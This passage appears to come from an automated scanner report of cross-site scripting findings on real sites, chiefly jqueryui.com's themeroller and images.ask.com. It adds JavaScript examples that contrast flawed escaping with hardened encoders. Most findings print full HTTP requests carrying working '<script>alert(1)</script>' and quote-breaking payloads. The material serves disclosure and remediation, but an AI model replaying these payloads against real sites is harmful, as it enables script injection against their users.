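    body: "/**/" + callback + "(" + JSON.stringify(data) + ");",
  };
}

// Payload from the finding above; SAMPLE is a constructed response object.
const PAYLOAD = "_ate.ad.hpr729d1<script>alert(1)</script>ee38120a664";
const SAMPLE = { ok: true };

// Stand-alone run: the raw handler reflects the tag, the hardened one refuses.
console.log(jsonpVulnerable(PAYLOAD, SAMPLE).body);
console.log(jsonpHardened(PAYLOAD, SAMPLE));
console.log(jsonpHardened("_ate.ad.hpr", SAMPLE).body);
```

Rejecting with 400 rather than silently substituting a default name keeps the endpoint's behaviour visible in logs, which is where a WAF-bypass attempt like the NULL-byte trick in the digg.com finding would otherwise go unnoticed.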
The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c305d\'%3b635163da252 was submitted in the q parameter. This input was echoed as c305d\\';635163da252 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string then the backslash character should be blocked, or escaped by replacing it with two backslashes. The backslash must be escaped before the quotation marks are; in the other order the backslash added for each quotation mark is itself doubled and the quotation mark is left unescaped, which is exactly the flaw above. Encoding both characters as hexadecimal escapes (\x5c and \x27) avoids the ordering problem altogether.
Request
GET /pictures?qsrc=0&o=0&l=dir&q=c305d\'%3b635163da252 HTTP/1.1
Host: images.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
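The two JavaScript-string findings in this report (REST URL parameter 2 on dictionary.reference.com, which was reflected unmodified, and the q parameter on images.ask.com, where only quotes were backslash-escaped) are both fixed by the same encoder. The following is an added example, not code from either application; the `var q = '...'` template and the checker are assumptions for illustration. It reproduces the quote-only escaping, shows the payload from the finding terminating the string, and then shows the hardened encoder keeping the same payload inside the literal while preserving its value.

```javascript
"use strict";
// Added example, not the images.ask.com or dictionary.reference.com code.
// It reproduces the escaping flaw described in the finding (quotes escaped,
// attacker-supplied backslashes left alone) next to an encoder that is safe
// inside an inline <script> block. The template string is an assumption.

// Wire form from the finding: c305d\'%3b635163da252  (decoded: c305d\';635163da252)
const PAYLOAD = "c305d\\';635163da252";

// Vulnerable: only quote characters are prefixed with a backslash, so the
// attacker's own backslash escapes the one the application adds.
function escapeQuotesOnly(s) {
  return String(s).replace(/'/g, "\\'");
}

// Hardened: backslash, both quote styles, the characters that could close the
// <script> element (< / >) and the line terminators JavaScript treats as
// newlines are all written as \xHH or \uHHHH escapes. Ordering no longer
// matters because every special character is replaced in one pass.
function escapeForJsString(s) {
  return String(s).replace(/[\\'"<>\/\u2028\u2029\r\n]/g, (ch) => {
    const code = ch.charCodeAt(0);
    return code < 0x100
      ? "\\x" + code.toString(16).padStart(2, "0")
      : "\\u" + code.toString(16).padStart(4, "0");
  });
}

// The template both applications are assumed to use.
function renderScript(escape, q) {
  return "var q = '" + escape(q) + "';";
}

// Walks the text after "var q = '" the way the JavaScript tokenizer does: a
// backslash consumes the next character; the first bare quote closes the
// literal. Returns whatever follows that closing quote (attacker-controlled
// code) or null when the literal closes exactly where the template closes it.
function codeOutsideLiteral(script) {
  let i = script.indexOf("'") + 1;
  while (i < script.length) {
    if (script[i] === "\\") { i += 2; continue; }
    if (script[i] === "'") break;
    i++;
  }
  const rest = script.slice(i + 1);
  return rest === ";" ? null : rest;
}

// Executes the hardened output to confirm the original value survives intact.
function roundTrip(s) {
  return new Function(renderScript(escapeForJsString, s) + " return q;")();
}

// Stand-alone run.
console.log("quote-only :", renderScript(escapeQuotesOnly, PAYLOAD),
  "-> outside literal:", JSON.stringify(codeOutsideLiteral(renderScript(escapeQuotesOnly, PAYLOAD))));
console.log("hardened   :", renderScript(escapeForJsString, PAYLOAD),
  "-> outside literal:", JSON.stringify(codeOutsideLiteral(renderScript(escapeForJsString, PAYLOAD))));
console.log("round trip :", roundTrip(PAYLOAD) === PAYLOAD);
```

Escaping `<` and `/` is what makes the encoder safe inside an inline script block as well as inside a standalone .js response: the HTML parser ends a `<script>` element at the literal sequence `</script` regardless of any JavaScript quoting, so a quote-safe but `<`-unsafe encoder is still exploitable when the string is embedded in a page.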
The value of the bgColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b626"><script>alert(1)</script>9ec3e8ecc13 was submitted in the bgColorActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F85b626"><script>alert(1)</script>9ec3e8ecc13&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:52:56 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322
The value of the bgColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b6b8"><script>alert(1)</script>2191a8942ba was submitted in the bgColorContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF3b6b8"><script>alert(1)</script>2191a8942ba&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:52:34 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322
The value of the bgColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d054d"><script>alert(1)</script>a6d04b0004 was submitted in the bgColorDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFFd054d"><script>alert(1)</script>a6d04b0004&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:52:41 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120319
The value of the bgColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4088"><script>alert(1)</script>2de39e79b84 was submitted in the bgColorError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFFd4088"><script>alert(1)</script>2de39e79b84&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:53:51 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322
The value of the bgColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92f8a"><script>alert(1)</script>5c9db817cbc was submitted in the bgColorHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD92f8a"><script>alert(1)</script>5c9db817cbc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:52:26 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322
The value of the bgColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8955b"><script>alert(1)</script>3d3632ac57f was submitted in the bgColorHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C8955b"><script>alert(1)</script>3d3632ac57f&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:53:43 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322
The value of the bgColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6591f"><script>alert(1)</script>a2709f92cce was submitted in the bgColorHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF6591f"><script>alert(1)</script>a2709f92cce&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:52:49 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322
The value of the bgColorOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ddc89"><script>alert(1)</script>3fd82bd44b8 was submitted in the bgColorOverlay parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000ddc89"><script>alert(1)</script>3fd82bd44b8&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:53:58 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322
The value of the bgColorShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a65e5"><script>alert(1)</script>00ab20f4a9f was submitted in the bgColorShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDDa65e5"><script>alert(1)</script>00ab20f4a9f&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:54:02 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322
The value of the bgImgOpacityActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2f2d"><script>alert(1)</script>97f8aa11556 was submitted in the bgImgOpacityActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100d2f2d"><script>alert(1)</script>97f8aa11556&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:53:13 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322
The value of the bgImgOpacityContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 997f9"><script>alert(1)</script>4169bdc7a36 was submitted in the bgImgOpacityContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
